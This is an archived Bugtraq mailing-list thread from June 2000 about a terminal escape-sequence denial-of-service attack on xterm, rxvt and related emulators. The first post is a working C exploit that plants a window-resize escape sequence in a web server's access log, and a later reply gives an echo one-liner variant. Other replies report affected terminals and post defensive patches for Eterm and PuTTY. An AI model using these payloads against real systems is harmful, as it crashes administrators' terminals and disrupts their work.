5153978 2000-06-02 02:28 /100 rader/ Postmaster
Mottagare: Bugtraq (import) <11105>
Ärende: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Sender: kit@ruff
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.21.0006011118280.17559-100000@ruff>
Date: Thu, 1 Jun 2000 11:21:16 -0700
Reply-To: Kit Knox <kit@ROOTSHELL.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Kit Knox <kit@ROOTSHELL.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
/*
*
* xterm Denial of Service Attack
* (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
*
* Tested against: xterm (XFree86 3.3.3.1b(88b) -- crashes
* rxvt v2.6.1 -- consumes all available memory and then
* crashes.
*
* Not vulnerable: KDE konsole 0.9.11
* Secure CRT 3.0.x
*
*
* By sending the VT control characters to resize a window it is possible
* to cause an xterm to crash and in some cases consume all available
* memory.
*
* This itself isn't much of a problem, except that remote users can inject
* these control characters into your xterm numerous ways including :
*
* o Directories and filenames on a rogue FTP servers.
* o Rogue banner messages on ftp, telnet, mud daemons.
* o Log files (spoofed syslog messages, web server logs, ftp server logs)
*
* This sample exploit injects these control characters into a web get
* request. If an admin were to cat this log file, or happened to be doing
* a "tail -f access_log" at the time of attack they would find their
* xterm crash.
*
* Embedding "ESCAPE[4;65535;65535t" (where escape is the escape character)
* inside files, directories, etc will have the same effect as this code.
*
*/
#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
int sock;
int
main (int argc, char *argv[])
{
struct hostent *he;
struct sockaddr_in sa;
char buf[1024];
char packet[1024];
int i;
fprintf(stderr, "[ http://www.rootshell.com/ ] - xterm DoS attack - 05/31/2000.\n\n");
if (argc != 2)
{
fprintf (stderr, "usage: %s <host/ip>\n", argv[0]);
return (-1);
}
sock = socket (AF_INET, SOCK_STREAM, 0);
sa.sin_family = AF_INET;
sa.sin_port = htons (80);
he = gethostbyname (argv[1]);
if (!he)
{
if ((sa.sin_addr.s_addr = inet_addr (argv[1])) == INADDR_NONE)
return (-1);
}
else
{
bcopy (he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length);
}
if (connect (sock, (struct sockaddr *) &sa, sizeof (sa)) < 0)
{
fprintf (stderr,
"Fatal Error: Can't connect to web server.\n");
return (-1);
}
sprintf(packet, "GET /\033[4;65535;65535t HTTP/1.0\n\n");
write (sock, packet, strlen(packet));
close (sock);
fprintf(stderr, "Done.\n");
}
(5153978) ------------------------------------------
5156308 2000-06-02 22:42 /111 rader/ Postmaster
Mottagare: Bugtraq (import) <11119>
Ärende: Re: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
Mail-Followup-To: BUGTRAQ@SECURITYFOCUS.COM
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="RpDyejMaDGJhP2PU"
Content-Disposition: inline
User-Agent: Mutt/1.1.12i-CVS-2000-04-28--11:43
X-Disclaimer: I do not presume to speak for anyone but myself.
X-PGP-Key: http://www.eterm.org/mej.asc
Message-ID: <20000601192946.M6042@valinux.com>
Date: Thu, 1 Jun 2000 19:29:46 -0700
Reply-To: Michael Jennings <mej@VALINUX.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michael Jennings <mej@VALINUX.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.21.0006011118280.17559-100000@ruff>; fro
kit@ROOTSHELL.COM on Thu, Jun 01, 2000 at 11:21:16AM -0700
--RpDyejMaDGJhP2PU
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
On Thursday, 01 June 2000, at 11:21:16 (-0700),
Kit Knox wrote:
> * xterm Denial of Service Attack
> * (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
> *
> * Tested against: xterm (XFree86 3.3.3.1b(88b) -- crashes
> * rxvt v2.6.1 -- consumes all available memory and then
> * crashes.
All current versions of Eterm are vulnerable. Attached are patches to
Eterm 0.8.10 and 0.9. Similar changes have been committed to 0.8.11
and 0.9.1 in CVS.
Michael
--
"Greater than the death of flesh is the death of hope, the death of
dreams. Against this peril we can never surrender."
-- G'Kar, Babylon 5
=======================================================================
Michael Jennings <mej@eterm.org> www.tcserv.com PGP Key ID: BED09971
Software Engineer, VA Linux Systems Author, Eterm (www.eterm.org)
--RpDyejMaDGJhP2PU
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="Eterm-0.8.10-DoS.patch"
Index: src/command.c
===================================================================
RCS file: /cvs/enlightenment/Eterm/src/command.c,v
retrieving revision 1.1.1.1.2.7
diff -u -r1.1.1.1.2.7 command.c
--- src/command.c 1999/11/02 16:34:35 1.1.1.1.2.7
+++ src/command.c 2000/06/02 02:06:56
@@ -4694,6 +4694,9 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ if (x > scr->width || y > scr->height) {
+ return;
+ }
XResizeWindow(Xdisplay, TermWin.parent, x, y);
break;
case 5:
@@ -4713,6 +4716,9 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ if (x > (scr->width / TermWin.fwidth) || y > (scr->height /
TermWin.fheight)) {
+ return;
+ }
XResizeWindow(Xdisplay, TermWin.parent,
Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_visible()? scrollbar_total_width() : 0),
Height2Pixel(y) + 2 * TermWin.internalBorder + (menubar_visible()? menuBar_TotalHeight() : 0));
--RpDyejMaDGJhP2PU
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="Eterm-0.9-DoS.patch"
Index: src/term.c
===================================================================
RCS file: /cvs/enlightenment/Eterm/src/term.c,v
retrieving revision 1.33
diff -u -r1.33 term.c
--- src/term.c 2000/01/17 21:29:27 1.33
+++ src/term.c 2000/06/02 02:06:44
@@ -1232,6 +1232,8 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ UPPER_BOUND(y, scr->height);
+ UPPER_BOUND(x, scr->width);
XResizeWindow(Xdisplay, TermWin.parent, x, y);
#ifdef USE_XIM
xim_set_status_position();
@@ -1254,6 +1256,8 @@
return; /* Make sure there are 2 args left */
y = args[++i];
x = args[++i];
+ UPPER_BOUND(y, scr->height / TermWin.fheight);
+ UPPER_BOUND(x, scr->width / TermWin.fwidth);
XResizeWindow(Xdisplay, TermWin.parent,
Width2Pixel(x) + 2 * TermWin.internalBorder + (scrollbar_is_visible()? scrollbar_trough_width() : 0),
Height2Pixel(y) + 2 * TermWin.internalBorder);
--RpDyejMaDGJhP2PU--
(5156308) ------------------------------------------(Ombruten)
5158060 2000-06-04 03:07 /33 rader/ Postmaster
Mottagare: Bugtraq (import) <11133>
Ärende: Re: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.21.0006021644330.17797-100000@eos13.csis.gvsu.edu>
Date: Fri, 2 Jun 2000 16:46:57 -0400
Reply-To: gavina@CSIS.GVSU.EDU
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: gavina@CSIS.GVSU.EDU
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200006021221.WAA20903@cairo.anu.edu.au>
On Thu, 1 June 2000, Kit Knox wrote:
>
> /*
> *
> * xterm Denial of Service Attack
> * (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
> *
> * Tested against: xterm (XFree86 3.3.3.1b(88b) -- crashes
> * rxvt v2.6.1 -- consumes all available memory and then
> * crashes.
aterm 0.3.6 is not vulnerable. When you cat a file containing that
string, it displays nothing. Using a text editor, you can see the
contents.
------------------------
"He who rides the pony must someday fall."
- Andrew Wood
(5158060) ------------------------------------------
5158347 2000-06-04 04:20 /24 rader/ Postmaster
Mottagare: Bugtraq (import) <11142>
Ärende: Re: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.21.0006022326020.5914-100000@studenternet.auc.dk>
Date: Fri, 2 Jun 2000 23:27:58 +0200
Reply-To: Soeren Staun-Pedersen <staun@ITCAMPUS.DK>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Soeren Staun-Pedersen <staun@ITCAMPUS.DK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.04.10006012122560.5072-100000@willy.armour.cx>
> Confirmed also against Eterm 0.8.10.
>
> In fact, it took X all the way down (XFree86 4.0).
Redhat 6.0+: gnome-terminal is not vulnerable either. Xterm is, X seems
stable though.
Soeren Staun-Pedersen - Staun@SunSITE.auc.dk
------
"The internet is full, beat it"
- Me.
(5158347) ------------------------------------------
5161766 2000-06-05 04:29 /33 rader/ Postmaster
Mottagare: Bugtraq (import) <11158>
Ärende: Re: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@securityfocus.com
Message-ID: <200006041635.SAA07110@sebs.hans.de>
Date: Sun, 4 Jun 2000 18:35:27 +0200
Reply-To: gone@GRAFFITI.NET
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Hans, Sebastian" <gone@GRAFFITI.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
> /*
> *
> * xterm Denial of Service Attack
> * (C) 2000 Kit Knox <kit@rootshell.com> - 5/31/2000
> *
> * Tested against: xterm (XFree86 3.3.3.1b(88b) -- crashes
snip
> * Embedding "ESCAPE[4;65535;65535t" (where escape is the escape character)
> * inside files, directories, etc will have the same effect as this code.
> *
> */
I tried this with my xterm (XFree86 3.3.3.1b(88b)) - it didn't work.
Substituting 65536 for 65535 did the job:
echo -e "\033[4;65536;65536t"
Sebastian Hans
gone@graffiti.net
--
The light at the end of the tunnel is the headlight of an approaching
train.
(5161766) ------------------------------------------
5177283 2000-06-08 22:08 /100 rader/ Postmaster
Mottagare: Bugtraq (import) <11219>
Ärende: Re: [rootshell.com] Xterm DoS Attack
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Message-ID: <E12zFeu-00075I-00@ixion>
Date: Tue, 6 Jun 2000 10:28:28 +0100
Reply-To: Simon Tatham <anakin@POBOX.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Simon Tatham <anakin@POBOX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <m2n.12yll4-000piL@chiark.greenend.org.uk>
wakko@WTOWER.COM writes:
[xterm DoS through terminal-size sequences]
> This breaks PuTTY [a Win32 SSH client] as well.
Yesterday I checked in a fix to the PuTTY master CVS repository, and
last night's automated build ran successfully. This morning's PuTTY
development snapshot appears to be OK.
I wasn't able to reproduce the exploit using the same escape
sequence as in the xterm-destroying example code; on the other hand,
PuTTY was vulnerable to other sequences in the same spirit.
Philosophically, I have a hard time seeing this as a bug in any
given terminal emulator. There _should_ be a way for a (trusted) app
running in a terminal emulator to request window size changes and
other such things; it's very useful. And in the absence of separated
control and data streams within a terminal session (in which case
one could allow `cat' unrestricted access to the data stream and it
would not be able to DoS by injecting malice into the control
stream), the whole terminal session must be considered to be the
control stream, and vulnerable. Don't `cat' untrusted files.
(Of course, APC in MS-Kermit is possibly the worst exploit of this
type I've _ever_ seen. With a well-chosen escape sequence you could
direct the MS-Kermit program to run arbitrary commands on its host
machine...)
Anyway. Current development snapshots of PuTTY are now believed
robust. A 0.49 release containing the fix will be coming out RSN,
since security is the one thing that really makes me get off my butt
and put new releases out _quickly_ :-)
The patch is quoted below.
---------- begin patch ----------
Index: src/putty/terminal.c
===================================================================
RCS file: /home/cvs/putty/terminal.c,v
retrieving revision 1.18
retrieving revision 1.19
diff -u -r1.18 -r1.19
--- src/putty/terminal.c 2000/03/17 10:46:59 1.18
+++ src/putty/terminal.c 2000/06/05 16:33:58 1.19
@@ -1209,7 +1209,11 @@
*/
compatibility(VT340TEXT);
if (esc_nargs<=1 && (esc_args[0]<1 || esc_args[0]>=24)) {
- request_resize (cols, def(esc_args[0], 24), 0);
+ unsigned int newrows = def(esc_args[0], 24);
+ /* Hack: prevent big-resize DoS attack. */
+ if (newrows > max(512, cfg.height))
+ newrows = max(512, cfg.height);
+ request_resize (cols, newrows, 0);
deselect();
}
break;
@@ -1221,7 +1225,11 @@
*/
compatibility(VT420);
if (esc_nargs==1 && esc_args[0]>=24) {
- request_resize (cols, def(esc_args[0], cfg.height), 0);
+ unsigned int newrows = def(esc_args[0], cfg.height);
+ /* Hack: prevent big-resize DoS attack. */
+ if (newrows > max(512, cfg.height))
+ newrows = max(512, cfg.height);
+ request_resize (cols, newrows, 0);
deselect();
}
break;
@@ -1232,7 +1240,11 @@
*/
compatibility(VT340TEXT);
if (esc_nargs<=1) {
- request_resize (cols, def(esc_args[0], cfg.width), 0);
+ unsigned int newcols = def(esc_args[0], cfg.width);
+ /* Hack: prevent big-resize DoS attack. */
+ if (newcols > max(512, cfg.width))
+ newcols = max(512, cfg.width);
+ request_resize (newcols, rows, 0);
deselect();
}
break;
----------- end patch -----------
Cheers,
Simon
--
Simon Tatham "infinite loop _see_ loop, infinite"
<anakin@pobox.com> - Index, Borland Pascal Language Guide
(5177283) ------------------------------------------